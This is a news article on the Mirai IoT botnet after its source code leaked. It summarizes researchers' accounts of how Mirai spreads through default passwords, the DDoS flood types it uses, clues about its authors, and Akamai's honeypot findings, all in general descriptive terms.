Now that its source code has been released you can expect more attacks from Mirai, the malware behind the largest DDoS attack on record, which was powered by hijacked IoT devices.Since release of that code last week it has been responsible for smaller attacks that look like newcomers experimenting with the malware in preparation for bigger things, say security researchers at Incapsula. \u201cLikely, these are signs of things to come and we expect to deal with Mirai-powered attacks in the near future,\u201d they say in their blog post.That concern is echoed by researchers at F5, who say, \u201cwe can definitely expect the IoT DDoSing trend to rise massively in the global threat landscape.\u201dThe historic attacks over the past two weeks that took down the popular KrebsOnSecurity site and challenged the resources of French hosting provider OVH mark the latest spikes in DDoS volume, which means mitigation infrastructure has to be prepared for attacks that are three to five times as large, according to Josh Shaul, vice president of web security for Akamai.He says that despite the power of the attacks \u2013 up to 1Tbps \u2013 there\u2019s nothing special about Mirai, which is named for the anime character Mirai Suenaga. \u201cUsually the cool stuff is the exploits or the ability of the malware to hide or be persistent. Mirai can persist through a reboot of the infected device, but it\u2019s not super sophisticated.\u201dIt gets on systems by being installed after attackers login with default passwords. Mirai connects to an IRC-type service where it waits for commands. It doesn\u2019t try to hide from forensic analysis, probably because the type of device it\u2019s on won\u2019t have an owner who is skilled enough to look for it. \u201cIt\u2019s no Stuxnet,\u201d he says.The malware finds vulnerable machines by scanning a broad range of IP addresses until it finds IoT devices with easily guessable passwords, Incapsula says. It\u2019s got a number of DDoS attack methods in its playbook, including GRE, SYN, ACK, DNS, UDP and Simple Text Oriented Message Protocol (STOMP) floods.The DNS attacks include the uncommon DNS Water Torture attack which overloads DNS servers used to resolve queries about the actual target, F5 says. When one server gets overloaded, the queries are retransmitted to another DNS server of the target and so on until legitimate traffic can\u2019t be directed to the target.Akamai\u2019s Shaul says attackers are using smaller packets in their attacks, which stresses the networking equipment near the targeted servers as well as the servers themselves. Routers have to spend processing power for each packet regardless of length, so boosting the sheer number of packets can cause network bottlenecks.He says Akamai has observed this effect. \u201cWith less traffic but more packets, you can break the network gear in the middle,\u201d he says. \u201cWe saw both sides of that equation in those attacks last week.\u201dWho\u2019s behind it?\u201cOne of the most interesting things revealed by the code was a hardcoded list of IPs Mirai bots are programmed to avoid when performing their IP scans,\u201d Incapsula says. Those include the U.S. Department of Defense, the U.S. Post Office, HP, GE and the Internet Assigned Numbers Authority.That leads the Incapsula researchers to speculate that the creators of the malware are na\u00efvely trying to avoid attention by eliminating those IP ranges, then following up by using it to launch one of the most scrutinized attacks ever. \u201cTogether these paint a picture of a skilled, yet not particularly experienced, coder who might be a bit over his head,\u201d they write, but not a veteran cyber criminal.The code uses English for its command and control interface but also contains strings in Russian. \u201cThis opens the door for speculation about the code\u2019s origin, serving as a clue that Mirai was developed by Russian hackers or\u2014at least\u2014a group of hackers, some of whom were of Russian origin,\u201d they write.Whoever is behind Mirai might have launched the big attacks as a demonstration of its capabilities so the threat of a similar attack could be used to extort cash from potential victims in order to avoid the DDoS attack, Shaul says.Those who download the software might be someone who has assembled a general-purpose botnet and wants to weaponized it as a DDoS army that could be used, say, in a DDoS-for-hire business. \u201cI\u2019d be surprised if we don\u2019t see that happen,\u201d he says. \u201cThe person who\u2019s got the skills to do botfarming may not have the skills to do DDoS.\u201dIndividuals probably won\u2019t download Mirai to carry out a spiteful DDoS attack because it\u2019s much more efficient to hire a service, he says.Recruiting IoT botnets has a lot of advantages over trying to compromise PCs and servers, experts say:Many IoT devices have publicly exposed administrative ports protected only by default passwords.The devices lack security software such as anti-virus.Residential customers and small businesses that lack security sophistication are in charge of protecting the devices.Typically IoT gear is connected to the internet all the time.Attackers don\u2019t have to deal with social engineering, email poisoning or expensive zero day attacks.Akamai came across what came to be known as Mirai via a honeypot it set last summer that drew attempts to log into the box. Most of the attempts came from China, he says, and most were trying to log in to root. Many of the passwords being tried to log in to the honey pot were unique default passwords for IoT devices \u2013 closed circuit cameras and DVRs.Sometimes on login prompts the attacks would use shell commands, indicating that the malware had a bug that made it blind to the fact that its login attempt had failed so it ran commands as if it had logged in successfully. The commands were attempts to download the Mirai malware.That gave Akamai researchers something to compare actual attack traffic to.Akamai tracked down some of the hosts in the botnet and found they were closed-circuit cameras and DVR systems. So the packets being sent were similar to what Mirai sends and the types of devices in the attacks were the types Miria preys upon.